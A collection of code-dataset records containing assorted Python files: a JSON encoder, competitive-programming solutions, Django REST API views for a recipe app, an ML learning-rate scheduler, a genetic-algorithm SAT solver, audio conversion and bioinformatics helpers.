client.json_encoder = jsonable_encoder\n\n \"\"\"\n from ai_transform.utils import DocumentList, Document\n\n # Loop through iterators and convert\n if isinstance(obj, (list, set, frozenset, GeneratorType, tuple, collections.deque)):\n encoded_list = []\n for item in obj:\n encoded_list.append(json_encoder(item, force_string=force_string))\n return encoded_list\n\n # Loop through dictionaries and convert\n if isinstance(obj, dict):\n encoded_dict = {}\n for key, value in obj.items():\n encoded_key = json_encoder(key, force_string=force_string)\n encoded_value = json_encoder(value, force_string=force_string)\n encoded_dict[encoded_key] = encoded_value\n return encoded_dict\n\n # Custom conversions\n if dataclasses.is_dataclass(obj):\n return dataclasses.asdict(obj)\n if isinstance(obj, Enum):\n return obj.value\n if isinstance(obj, PurePath):\n return str(obj)\n if isinstance(obj, (str, int, type(None))):\n return obj\n if isinstance(obj, float):\n if math.isnan(obj):\n return None\n return obj\n if isinstance(obj, (Document, DocumentList)):\n return obj.to_json()\n if type(obj) in ENCODERS_BY_TYPE:\n return ENCODERS_BY_TYPE[type(obj)](obj) # type: ignore\n\n if force_string:\n return repr(obj)\n\n if isinstance(obj, pd.Timestamp):\n return repr(obj)\n\n raise ValueError(f\"{obj} ({type(obj)}) cannot be converted to JSON format\")\n","repo_name":"RelevanceAI/ai-transform","sub_path":"ai_transform/utils/json_encoder.py","file_name":"json_encoder.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"72182068328","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nif __name__ == \"__main__\":\r\n t = int(input())\r\n\r\n for _ in range(t):\r\n n = int(input())\r\n sticker = []\r\n sticker.append(list(map(int, input().split())))\r\n sticker.append(list(map(int, input().split())))\r\n\r\n for i in range(1, n):\r\n if i == 1:\r\n sticker[0][i] += sticker[1][i-1]\r\n sticker[1][i] += sticker[0][i-1]\r\n else:\r\n sticker[0][i] += max(sticker[1][i-1], sticker[1][i-2], sticker[0][i-2])\r\n sticker[1][i] += max(sticker[0][i-1], sticker[0][i-2], sticker[1][i-2])\r\n\r\n if n == 1:\r\n print(max(sticker[0][0], sticker[1][0]))\r\n else:\r\n print(max(sticker[0][n-1], sticker[1][n-1], sticker[0][n-2], sticker[1][n-2]))\r\n","repo_name":"yerim10044001/ProblemSolving","sub_path":"백준/Silver/9465. 스티커/스티커.py","file_name":"스티커.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36336798395","text":"from django.conf import settings\nfrom django.contrib.auth import authenticate\nfrom django.db.models import Sum\nfrom django.http import HttpResponse\nfrom rest_framework import mixins, permissions, status, viewsets\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework.validators import ValidationError\nfrom rest_framework.views import APIView\n\nfrom api import serializers\nfrom recipes import models\nfrom users.models import Subscription, User\n\nfrom .filters import recipe_queryset_fiter\nfrom .pagination import RecipePagination\nfrom .permissions import IsAuthorOrReadOnly\n\n\nclass LoginView(APIView):\n permission_classes = [permissions.AllowAny]\n\n def post(self, request):\n email = request.data.get('email')\n password = request.data.get('password')\n user = authenticate(email=email, password=password)\n if user is not None:\n if not Token.objects.filter(user=user).exists():\n Token.objects.create(user=user)\n response = {'auth_token': user.auth_token.key}\n return Response(data=response, status=status.HTTP_201_CREATED)\n return Response(data={'message': 'Неверный email или пароль'})\n\n\nclass LogoutView(APIView):\n permission_classes = [permissions.IsAuthenticated]\n\n def post(self, request):\n user = request.user\n if user is not None:\n request.user.auth_token.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n return Response(data={'message': 'Пользователь не авторизван'})\n\n\nclass UserViewSet(\n mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n mixins.ListModelMixin,\n viewsets.GenericViewSet\n):\n queryset = User.objects.all()\n\n def get_permissions(self):\n if self.action in ('me', 'set_password', 'subscribe', 'subscriptions'):\n return [permissions.IsAuthenticated()]\n if self.action == 'destroy':\n return [IsAuthorOrReadOnly()]\n return super().get_permissions()\n\n def get_serializer_class(self):\n if self.request.method == 'POST':\n return serializers.SignUpSerializer\n return serializers.UserSerializer\n\n @action(detail=False, methods=['get'])\n def me(self, request):\n serializer = self.get_serializer(request.user)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['post'])\n def set_password(self, request):\n serializer = serializers.PasswordSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = request.user\n if user.check_password(serializer.data.get('current_password')):\n new_password = serializer.data.get('new_password')\n user.set_password(new_password)\n user.save()\n return Response(status=status.HTTP_204_NO_CONTENT)\n return Response(\n data={'message': 'Текущий пароль не совпадает'},\n status=status.HTTP_400_BAD_REQUEST\n )\n\n @action(detail=True, methods=['post', 'delete'])\n def subscribe(self, request, pk):\n data = {'author': pk, 'subscriber': request.user.id}\n author = User.objects.filter(pk=pk).first()\n subscriber = request.user\n if request.method == 'POST':\n serializer = serializers.SubscribeSerializer(data=data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n serializer = serializers.UserSerializer(\n instance=author, context={'request': request}\n )\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n elif request.method == 'DELETE':\n Subscription.objects.filter(\n author=author, subscriber=subscriber\n ).delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n @action(detail=False, methods=['get'])\n def subscriptions(self, request):\n params = request.query_params.get(\n 'recipes_limit',\n settings.DEFAULT_PAGE_SIZE,\n )\n context = self.get_serializer_context()\n try:\n context['recipes_limit'] = int(params)\n except ValueError:\n raise ValidationError({'message': 'recipes_limit не число'})\n queryset = self.get_queryset()\n queryset = queryset.filter(\n author__subscriber=request.user\n ).all()\n page = self.paginate_queryset(queryset=queryset)\n serializer = serializers.UserSubscribeSerializer(\n page,\n context=context,\n many=True\n )\n return self.get_paginated_response(serializer.data)\n\n\nclass TagViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = models.Tag.objects.all()\n serializer_class = serializers.TagSerializer\n pagination_class = None\n\n\nclass IngredientViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = models.Ingredient.objects.all()\n serializer_class = serializers.IngridientsSerializer\n pagination_class = None\n\n def get_queryset(self):\n queryset = models.Ingredient.objects\n name = self.request.query_params.get('name')\n if name:\n queryset = queryset.filter(name__istartswith=name)\n return queryset.all()\n\n\nclass RecipeViewSet(viewsets.ModelViewSet):\n pagination_class = RecipePagination\n\n def get_permissions(self):\n if self.action in (\n 'shopping_cart',\n 'favorite',\n 'download_shopping_cart'\n ):\n return [permissions.IsAuthenticated()]\n if self.action == 'destroy':\n return [IsAuthorOrReadOnly()]\n return super().get_permissions()\n\n def get_serializer_class(self):\n if self.action == 'shopping_cart':\n return serializers.ShoppingCartSerializer\n if self.action == 'favorite':\n return serializers.FavoriteSerializer\n if self.request.method in ('POST', 'PATCH'):\n return serializers.RecipeCreateUpdateSerializer\n return serializers.RecipeSerializer\n\n def get_queryset(self):\n user = self.request.user\n queryset = models.Recipe.objects.select_related(\n 'author').prefetch_related('tags', 'ingredients')\n queryset = queryset.annotate_quryset(user)\n queryset = recipe_queryset_fiter(queryset, self.request)\n return queryset\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n\n @action(detail=True, methods=['post', 'delete'])\n def shopping_cart(self, request, pk=None):\n return self._shopping_cart_favoite(pk, models.ShoppingCart)\n\n @action(detail=True, methods=['post', 'delete'])\n def favorite(self, request, pk=None):\n return self._shopping_cart_favoite(pk, models.Favorites)\n\n def _shopping_cart_favoite(self, pk, Klass):\n data = {'recipe': pk, 'user': self.request.user.id}\n item = models.Recipe.objects.filter(pk=data['recipe']).first()\n user = self.request.user\n if self.request.method == 'POST':\n serializer = self.get_serializer(data=data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(\n data=serializers.RecipeFavoriteCartSerializer(\n instance=item\n ).data,\n status=status.HTTP_201_CREATED\n )\n elif self.request.method == 'DELETE':\n Klass.objects.filter(user=user, recipe=item).delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n @action(detail=False, methods=['get'])\n def download_shopping_cart(self, request):\n name = 'ingredient__name'\n unit = 'ingredient__measurement_unit'\n ingredients = models.IngredientInRecipe.objects.select_related(\n 'recipe',\n 'ingredient',\n ).filter(recipe__shopping_cart__user=request.user)\n ingredients = ingredients.values(\n name,\n unit,\n ).annotate(total=Sum('amount')).order_by('-total')\n catalog = '\\n'.join(f'{item[name]} - {item[\"total\"]} {item[unit]}'\n for item in ingredients) + settings.FILE_MESSAGE\n response = HttpResponse(catalog, content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"text.txt\"'\n return response\n","repo_name":"bigfuto/foodgram","sub_path":"backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30173994903","text":"from Networks import BitonicSort,OddEvenMergesort, PeriodicSort, RandShellSort, FourWaySort\nfrom Layerize import layerize\nfrom math import log2\n\ndef Touch(index, width, lines, cache):\n\thit = None\n\tfor entry in cache:\n\t\tif entry == index - index % width:\n\t\t\thit = entry\n\t\t\tbreak\n\tif hit != None:\n\t\tcache.remove(hit)\n\t\tcache.append(hit)\n\t\treturn 0\n\telse:\n\t\tcache.append(index - index % width)\n\t\tif len(cache) > lines:\n\t\t\tcache.pop(0)\n\t\treturn 1\n\n\nwidth = 4\nlines = 16\n\nfor N in [256, 512, 1024, 2048, 4096, 4096*2,4096*4]:\n\tcount = 0\n\tcache = []\n\tcomps = list(BitonicSort(range(N)))\n\tfor i, j in comps:\n\t\tcount += Touch(i, width, lines, cache)\n\t\tcount += Touch(j, width, lines, cache)\n\tprint(count/(N/width*(log2(N)-log2(width*lines))**2))\n\n\n\n\n","repo_name":"krismaz/Thesis","sub_path":"Other/Cache.py","file_name":"Cache.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22606973786","text":"from itertools import *\nimport unittest\nfrom answers import get_correct_answer\n\ndef solve():\n alphabet = ['Л', 'Е', 'Т', 'О']\n answer = 0\n for word in product(alphabet, repeat=5):\n if 'Е' in word:\n answer += 1\n return answer\n\nclass Problem43(unittest.TestCase):\n def test(self):\n assert str(solve()) == get_correct_answer(8, 43)\n\nif __name__ == '__main__':\n print(solve())","repo_name":"DmitryKochetkov/polyakov_py","sub_path":"solutions8/problem43.py","file_name":"problem43.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40398706419","text":"# -*- coding: utf-8 -*-\n\nimport math\n\nfrom ncc import LOGGER\nfrom . import NccLRScheduler, register_lr_scheduler\n\n\n@register_lr_scheduler('cosine')\nclass CosineSchedule(NccLRScheduler):\n \"\"\"Assign LR based on a cyclical schedule that follows the cosine function.\n\n See https://arxiv.org/pdf/1608.03983.pdf for details.\n\n We also support a warmup phase where we linearly increase the learning rate\n from some initial learning rate (``--warmup-init-lr``) until the configured\n max learning rate (``--max-lr``).\n\n During warmup::\n\n lrs = torch.linspace(args.warmup_init_lr, args.lr, args.warmup_updates)\n lr = lrs[update_num]\n\n After warmup::\n\n lr = lr_min + 0.5*(lr_max - lr_min)*(1 + cos(t_curr / t_i))\n\n where ``t_curr`` is current percentage of updates within the current period\n range and ``t_i`` is the current period range, which is scaled by ``t_mul``\n after every iteration.\n \"\"\"\n\n def __init__(self, args, optimizer):\n super().__init__(args, optimizer)\n if len(args['optimization']['lr']) > 1:\n raise ValueError(\n 'Cannot use a fixed learning rate schedule with cosine.'\n ' Consider --lr-scheduler=fixed instead.'\n )\n\n self.min_lr = max(args['optimization'].get('min_lr', 0), 0)\n self.max_lr = args['optimization'].get('max_lr', args['optimization']['lr'][0])\n\n self.warmup_init_lr = args['optimization'].get('warmup_init_lr', 0)\n warmup_end_lr = args['optimization'].get('warmup_end_lr', self.max_lr)\n\n assert self.max_lr > self.min_lr, 'max_lr must be more than lr'\n\n self.t_mult = args['optimization'].get('t_mult', 1.)\n\n if 'lr_period_updates' not in args['optimization']:\n LOGGER.warning('lr_period_updates has not been set and, therefore, set epoch_num * batch_num as default.')\n self.period = -1\n else:\n self.period = args['optimization']['lr_period_updates']\n\n if args['optimization']['warmup_updates'] > 0:\n # linearly warmup for the first args.warmup_updates\n self.lr_step = \\\n (warmup_end_lr - args['optimization']['warmup_init_lr']) / args['optimization']['warmup_updates']\n else:\n self.lr_step = 1\n\n self.warmup_updates = args['optimization']['warmup_updates']\n self.lr_shrink = args['optimization'].get('lr_shrink', 0.1)\n\n # initial learning rate\n self.lr = args['optimization']['warmup_init_lr']\n self.optimizer.set_lr(self.lr)\n\n def step(self, epoch, val_loss=None):\n \"\"\"Update the learning rate at the end of the given epoch.\"\"\"\n super().step(epoch, val_loss)\n # we don't change the learning rate at epoch boundaries\n return self.optimizer.get_lr()\n\n def step_update(self, num_updates):\n \"\"\"Update the learning rate after each update.\"\"\"\n if num_updates < self.warmup_updates:\n self.lr = self.warmup_init_lr + num_updates * self.lr_step\n else:\n curr_updates = num_updates - self.warmup_updates\n if self.t_mult != 1:\n i = math.floor(math.log(1 - curr_updates / self.period * (1 - self.t_mult), self.t_mult))\n t_i = self.t_mult ** i * self.period\n t_curr = curr_updates - (1 - self.t_mult ** i) / (1 - self.t_mult) * self.period\n else:\n i = math.floor(curr_updates / self.period)\n t_i = self.period\n t_curr = curr_updates - (self.period * i)\n\n lr_shrink = self.lr_shrink ** i\n min_lr = self.min_lr * lr_shrink\n max_lr = self.max_lr * lr_shrink\n\n self.lr = min_lr + 0.5 * (max_lr - min_lr) * (1 + math.cos(math.pi * t_curr / t_i))\n\n self.optimizer.set_lr(self.lr)\n return self.lr\n","repo_name":"CGCL-codes/naturalcc","sub_path":"ncc/optimizers/lr_schedulers/cosine_lr_scheduler.py","file_name":"cosine_lr_scheduler.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"53"} +{"seq_id":"20541067278","text":"import numpy as np\n\nfrom pyratslam import Ptree, LocalViewMatch\n\nptree = Ptree(\"config_irataus.txt\")\nratslam_settings = ptree.get_child(\"ratslam\")\n\nlv = LocalViewMatch(ratslam_settings)\na = np.zeros((300, 300))\nlv.on_image(a, True, 300, 300)\n","repo_name":"AtlasBuggy/ratslam-python","sub_path":"test_pyratslam.py","file_name":"test_pyratslam.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6886675765","text":"\nimport struct\nimport os\nimport tempfile\nimport sys\nfrom subprocess import Popen,PIPE\n\nclass RSO(object):\n\n def __init__(self, sample_rate=8000, body=\"\"):\n self.sample_rate = sample_rate\n self.body = body\n\n def dump(self):\n return self.header() + self.body\n\n def write(self, fname):\n with file(fname, \"w\") as f:\n f.write(self.dump())\n\n def header(self):\n header = struct.pack(\"HHH\",len(self.body),self.sample_rate,0)\n return header\n\n\n def set_body_from_list(self, l):\n self.body = struct.pack(\"<%iB\" %len(l),*l)\n\n def set_body_from_text(self, text):\n args = [\"gst-launch\",\"fdsrc\",\"fd=0\",\"!\",\"festival\",\"!\",\"wavparse\",\"!\", \n \"audioconvert\",\"!\",\n \"audioresample\",\"quality=10\",\"!\",\"audio/x-raw-int,rate=%i\"%self.sample_rate,\"!\", \n \"audioconvert\",\"!\",\"audio/x-raw-int,channels=1,width=8,depth=8,signed=false\",\"!\", \n \"fdsink\", \"fd=2\"]\n\n p = Popen(args,stdin=PIPE,stdout=PIPE,stderr=PIPE)\n\n junk,self.body = p.communicate(text)\n return junk\n\n def set_body_from_file(self, file):\n args = [\"gst-launch\",\"filesrc\",\"location=%s\"%file,\"!\",\"decodebin\",\"!\", \n \"audioconvert\",\"!\", \n \"audioresample\",\"quality=10\",\"!\",\"audio/x-raw-int,rate=%i\"%self.sample_rate,\"!\", \n \"audioconvert\",\"!\",\"audio/x-raw-int,channels=1,width=8,depth=8,signed=false\",\"!\", \n \"fdsink\", \"fd=2\"]\n\n p = Popen(args,stdout=PIPE,stderr=PIPE)\n\n junk,self.body = p.communicate()\n return junk\n\n\n \n \n\n \n\nif __name__ == \"__main__\":\n fin = sys.argv[1]\n fout = sys.argv[2]\n r = RSO()\n if os.path.isfile(fin):\n r.set_body_from_file(fin)\n else:\n r.set_body_from_text(fin)\n r.write(fout)\n\n\n \n","repo_name":"jbryan/nxt-tools","sub_path":"nxtools/sound/rso.py","file_name":"rso.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26992951583","text":"import click\nimport os\nimport yaml\nimport time\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom GA import ga\nfrom os import listdir\nfrom os.path import isfile, join\n\n\n@click.command()\n@click.option('-c', '--config', metavar='CONFIG', help=\"Config file in yaml format.\")\ndef solve(config):\n \"\"\"Method solve each problem with all parameters specific in configuration file.\"\"\"\n if config is None:\n print(\"You need to specify a configuration file.\")\n config = load_config(config)\n csv = WriteCSVData(config['out'] + \"_data\" + \".csv\", \",\")\n inst_id_counter = 0\n if os.path.isdir(config['in']):\n only_files = [config['in'] + \"/\" + f for f in listdir(config['in']) if isfile(join(config['in'], f))]\n for file in only_files:\n problem = load_problem(file)\n for gen_count in drange(*config['generationcount']):\n for gen_size in drange(*config['generationsize']):\n for mut in drange(*config['mutation']):\n for cross in drange(*config['crossover']):\n for t_size in drange(*config['selection']):\n t1 = time.time()\n score, generations, n_sol, n_clau, n_best_weight, satisfied = ga(*problem, gen_count,\n gen_size, mut,\n cross, t_size,\n config['elitism'],\n config[\n 'selection_add'],\n config['fitness'])\n csv.append_line({\"id\": inst_id_counter, \"gen_size\": gen_size, \"gen_count\": int(gen_count),\n \"mut\": mut, \"cross\": cross, \"elitism\": config['elitism'],\n \"t_size\": t_size, \"time\": time.time() - t1, \"score\": score,\n \"satisfied\": satisfied, \"n_var\": problem[0], \"n_clause\": problem[1]})\n\n base_file_name = config['out'] + str(inst_id_counter) + \"_v\" + \\\n str(problem[0]) + \"_c\" + str(problem[1])\n # Solutions plot\n some_basic_plot(n_sol, int(gen_count), base_file_name + \"_sol\" + \".pdf\", \"Počet řešení\",\n [0, n_sol.max() + 1])\n some_basic_plot(n_best_weight, int(gen_count), base_file_name + \"_weight\" + \".pdf\",\n \"Hodnota řešení\", None)\n\n # Generations plots with fitness and satisfied clause\n some_stats_plot(n_clau, base_file_name + \"_cla\" + \".pdf\", \"Počet splněných clausulí\")\n some_stats_plot(generations, base_file_name + \"_gen\" + \".pdf\",\n \"Fitness\")\n inst_id_counter += 1\n print(\"Problem solved.\", inst_id_counter, \"/\", len(only_files))\n else:\n print(\"Problems not a path with problems.\")\n\n\ndef some_basic_plot(data, size, file, y_label, y_range):\n fig = plt.figure(figsize=(20, 17))\n\n ax = fig.add_subplot(1, 1, 1)\n ax.scatter([j for j in range(size)], y=data, s=500, marker='o', c='blue')\n ax.set_ylabel(y_label, fontsize=60)\n ax.set_xlabel(\"Generace\", fontsize=60)\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(40)\n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(40)\n if y_range is not None:\n ax.set_ylim(y_range)\n plt.grid()\n ax.set_axisbelow(True)\n fig.savefig(file)\n plt.close(fig)\n\n\ndef some_stats_plot(data, file, y_label):\n test = pd.DataFrame(data)\n test['max'] = test.max(axis=1)\n test['mean'] = test.mean(axis=1)\n test['median'] = test.median(axis=1)\n test['min'] = test.min(axis=1)\n test['max_x'] = test['min']\n max_x = 0\n for i in test.index:\n if test['max'][i] > max_x:\n test.loc[i, 'max_x'] = test['max'][i]\n max_x = test['max'][i]\n else:\n test.loc[i, 'max_x'] = test['max_x'][i - 1]\n\n fig = plt.figure(figsize=(20, 17))\n ax = fig.add_subplot(1, 1, 1)\n linewidth = 4\n ax.plot(test['max'], linewidth=linewidth)\n ax.plot(test['mean'], linewidth=linewidth)\n ax.plot(test['median'], linewidth=linewidth)\n ax.plot(test['min'], linewidth=linewidth)\n ax.plot(test['max_x'], linewidth=linewidth)\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(40)\n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(40)\n ax.legend(['max (generation)', 'mean', 'median', 'minimum', 'max (start)'],\n bbox_to_anchor=(0.5, 0.0, 0, 0), fontsize=45, ncol=2,\n mode=\"expand\", frameon=False, loc='lower center')\n ax.set_ylabel(y_label, fontsize=60)\n ax.set_xlabel(\"Generace\", fontsize=60)\n\n fig.savefig(file)\n plt.close(fig)\n\n\ndef load_problem(file):\n \"\"\"Load problem form file in DIMACS format use weights in comments.\"\"\"\n with open(file, 'r') as file:\n to_read = []\n chars = file.read().split(\"\\n\")\n clause = []\n weights = []\n cnt = 0\n n_c = 0\n n_v = 0\n for i in chars:\n if len(i) < 1:\n continue\n sp = i.strip().split()\n if sp[0] == 'c' and len(sp) > 1 and sp[1] == 'weights':\n weights = sp[2:]\n continue\n if sp[0] == 'c':\n continue\n if sp[0] == 'p':\n ind, problem, n_v, n_c = i.split()\n if problem.lower() != 'cnf':\n print('Can\\'t solve not cnf problem')\n return\n n_v = int(n_v)\n n_c = int(n_c)\n continue\n for j in sp:\n to_read.append(j)\n\n for j, k in enumerate(to_read):\n if k == '0':\n clause.append(to_read[:j])\n to_read = to_read[j + 1:]\n cnt += 1\n break\n if cnt >= n_c:\n break\n return n_v, n_c, weights, clause\n\n\ndef drange(start, stop, step):\n \"\"\"Range for double values.\"\"\"\n r = start\n while r < stop:\n yield r\n r += step\n\n\nclass WriteCSVData:\n \"\"\"Create file in csv format for writing stats.\"\"\"\n\n def __init__(self, file, sep=\",\"):\n self.file = open(file, 'w')\n self.head = None\n self.sep = sep\n\n \"\"\"Append one line to file, if it is first line -> create header\"\"\"\n\n def append_line(self, kwargs):\n if self.head is not None:\n self.write_line(kwargs)\n else:\n self.write_head(kwargs)\n self.write_line(kwargs)\n\n def write_head(self, kwargs):\n self.head = []\n for key in kwargs:\n self.head.append(key)\n self.file.write(self.sep.join([str(key) for key in self.head]) + \"\\n\")\n\n def write_line(self, kwargs):\n self.file.write(self.sep.join([str(kwargs[key]) for key in self.head]) + \"\\n\")\n self.file.flush()\n\n\ndef load_config(configuration_file):\n \"\"\"Load configuration from configuration file for one experimental run.\"\"\"\n config = {}\n with open(configuration_file, 'r') as configuration:\n cfg = yaml.load(configuration)\n if 'RUN' in cfg:\n tmp = cfg['RUN']\n if \"out\" in tmp:\n config['out'] = tmp['out']\n else:\n config['out'] = \"out\"\n if \"in\" in tmp:\n config['in'] = tmp['in']\n else:\n print(\"No inst to solve.\")\n exit(1)\n else:\n print(\"Configuration fail. See example.\")\n exit(1)\n if 'GA' in cfg:\n tmp = cfg['GA']\n for i in ['generationsize', 'generationcount', 'mutation', 'crossover', 'selection']:\n if i in tmp:\n if type(tmp[i]) is int or type(tmp[i]) is float:\n config[i] = [tmp[i], tmp[i] + 1, 2]\n continue\n s = tmp[i].split()\n if len(s) == 3:\n config[i] = [float(s[0]), float(s[1]), float(s[2])]\n continue\n print(\"Bad values\", i, \"please repair in config.\")\n exit(1)\n else:\n print(\"Not specific\", i, \"please add to config.\")\n exit(1)\n if 'elitism' in tmp:\n config['elitism'] = int(tmp['elitism'])\n else:\n config['elitism'] = 0\n if 'selection_add' in tmp:\n config['selection_add'] = int(tmp['selection_add'])\n else:\n config['selection_add'] = 0\n if 'fitness' in tmp:\n config['fitness'] = float(tmp['fitness'])\n else:\n config['fitness'] = 0.5\n else:\n print(\"Configuration fail. See example.\")\n exit(1)\n return config\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"martilad/MI-PAA2018","sub_path":"task5/WCNFSolver.py","file_name":"WCNFSolver.py","file_ext":"py","file_size_in_byte":9560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16215256720","text":"import sys\n\nmul = lambda: map(int, input().strip().split())\nseq = lambda: list(map(int, input().strip().split()))\nreadInt = lambda: int(input())\nreadLine = lambda: input().strip()\nsys.stdin = open(\"blocks.in\", \"r\")\nsys.stdout = open(\"blocks.out\", \"w\")\n\ndef computeFreq(s):\n freq = [0 for i in range(26)]\n for c in s:\n freq[ord(c) - ord('a')] += 1\n\n return freq\n\n\nn = readInt()\nans = [0 for i in range(26)]\nfor i in range(n):\n s1, s2 = input().strip().split()\n f1, f2 = computeFreq(s1), computeFreq(s2)\n for j in range(26):\n ans[j] += max(f1[j], f2[j])\n\nprint(*ans, sep='\\n')\n","repo_name":"adnaneaabbar/USACO-Guide","sub_path":"blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"23191909014","text":"import argparse\nimport sys\n\n# File format is [instance id] [individual_id] [library list]\n# return dictionaries of:\n# 1. instance_ids -> library id list and \n# 2. instance_ids -> individuals\ndef instances_maps(filename):\n\tinstances = {}\n\tinstance_to_individual = {}\n\twith open(filename) as f:\n\t\tfor line in f:\n\t\t\tfields = line.split()\n\t\t\tinstance_id = fields[0]\n\t\t\tindividual_id = fields[1]\n\t\t\tlibrary_ids = fields[2:]\n\t\t\tinstances[instance_id] = library_ids\n\t\t\tinstance_to_individual[instance_id] = individual_id\n\t\t\t# check that libraries list does not contain duplicates\n\t\t\tduplicates_check = {}\n\t\t\tfor library_id in library_ids:\n\t\t\t\tif library_id in duplicates_check:\n\t\t\t\t\traise ValueError('Duplicate library {} for instance id {}'.format(library_id, instance_id))\n\t\t\t\tduplicates_check[library_id] = 1\n\treturn instances, instance_to_individual\n\ndef split_pulldowns(instances_to_libraries, minimum_splits=1):\n\t# construct a list of instances that each library appears in\n\tlibrary_id_to_instance = {}\n\tfor instance_id in instances_to_libraries:\n\t\tfor library_id in instances_to_libraries[instance_id]:\n\t\t\t# make a blank list if first appearance of library_id\n\t\t\tif library_id not in library_id_to_instance:\n\t\t\t\tlibrary_id_to_instance[library_id] = []\n\t\t\t# add instance to list\n\t\t\tlibrary_id_to_instance[library_id].append(instance_id)\n\t\n\t# To pass read group checks, we need each read group to appear at most once in each pulldown\n\tnum_pulldowns = max([len(library_id_to_instance[library_id]) for library_id in library_id_to_instance])\n\tnum_pulldowns = max(num_pulldowns, minimum_splits)\n\t# setup enough blank lists to accomodate the most frequent library\n\t# we could also increase this for parallelization\n\tpulldown_instances = []\n\tfor x in range(num_pulldowns):\n\t\tpulldown_instances.append([])\n\tcount = 0\n\t# divide instances among num_pulldowns\n\t# no library will appear in a pulldown twice\n\tused_instances = set()\n\tfor library_id, instance_list in library_id_to_instance.items():\n\t\tfor instance in instance_list:\n\t\t\tif instance not in used_instances:\n\t\t\t\tpulldown_instances[count % num_pulldowns].append(instance)\n\t\t\t\tcount += 1\n\t\t\t\tused_instances.add(instance)\n\treturn pulldown_instances\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser(description=\"Prepare pulldown input files for by-sample pulldown batch.\")\n\t\n\tparser.add_argument(\"sample_bam_list\", help=\"Each line contains the instance id and its list of component libraries\")\n\tparser.add_argument('-m', '--minimum_splits', help=\"minimum number of separate pulldowns\", type=int, default='1')\n\t\n\targs = parser.parse_args()\n\t\n\tinstances_to_libraries, instances_to_individual = instances_maps(args.sample_bam_list)\n\tpulldowns_instances = split_pulldowns(instances_to_libraries, args.minimum_splits)\n\tpulldown_index = 1\n\tfor pulldown_instances in pulldowns_instances:\n\t\tfilename = \"pulldown_instances{:02d}\".format(pulldown_index)\n\t\twith open(filename, \"w\") as f:\n\t\t\tfor instance in pulldown_instances:\n\t\t\t\tprint(\"{}\\t{}\\t{}\".format(instance, instances_to_individual[instance], '\\t'.join(instances_to_libraries[instance]).strip()), file=f)\n\t\tpulldown_index += 1\n\t\n","repo_name":"DReichLab/adna-workflow","sub_path":"pulldown_split_bam_list.py","file_name":"pulldown_split_bam_list.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"22794423750","text":"\"\"\"Loads data from csv file.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\n\nimport os.path\n\n\ndef load_train_data():\n data = pd.read_csv('./data/train.csv')\n\n return data\n\n\ndef univariate_data(dataset, start_index, end_index, history_size, target_size):\n data = []\n labels = []\n if os.path.isfile(\"mean_std.txt\"):\n f = open('mean_std.txt', 'rb')\n mean_std = pickle.load(f)\n f.close()\n mean = mean_std[\"mean\"]\n std = mean_std[\"std\"]\n else:\n mean = dataset.mean()\n std = dataset.std()\n\n dataset = (dataset - mean) / std\n\n mean_std = {\"mean\": mean, \"std\": std}\n file = open('mean_std.txt', 'wb')\n pickle.dump(mean_std, file)\n file.close()\n\n start_index = start_index + history_size\n if end_index is None:\n end_index = len(dataset) - target_size\n\n for i in range(start_index, end_index):\n indices = range(i - history_size, i)\n # Reshape data from (history_size,) to (history_size, 1)\n pre_data = []\n for j in indices:\n pre_data.append(dataset[j])\n data.append(np.reshape(pre_data, (history_size, 1)))\n labels.append(dataset[i + target_size])\n return np.array(data), np.array(labels)\n\n\nif __name__ == \"__main__\":\n train_data = load_train_data()\n print(train_data.info())\n 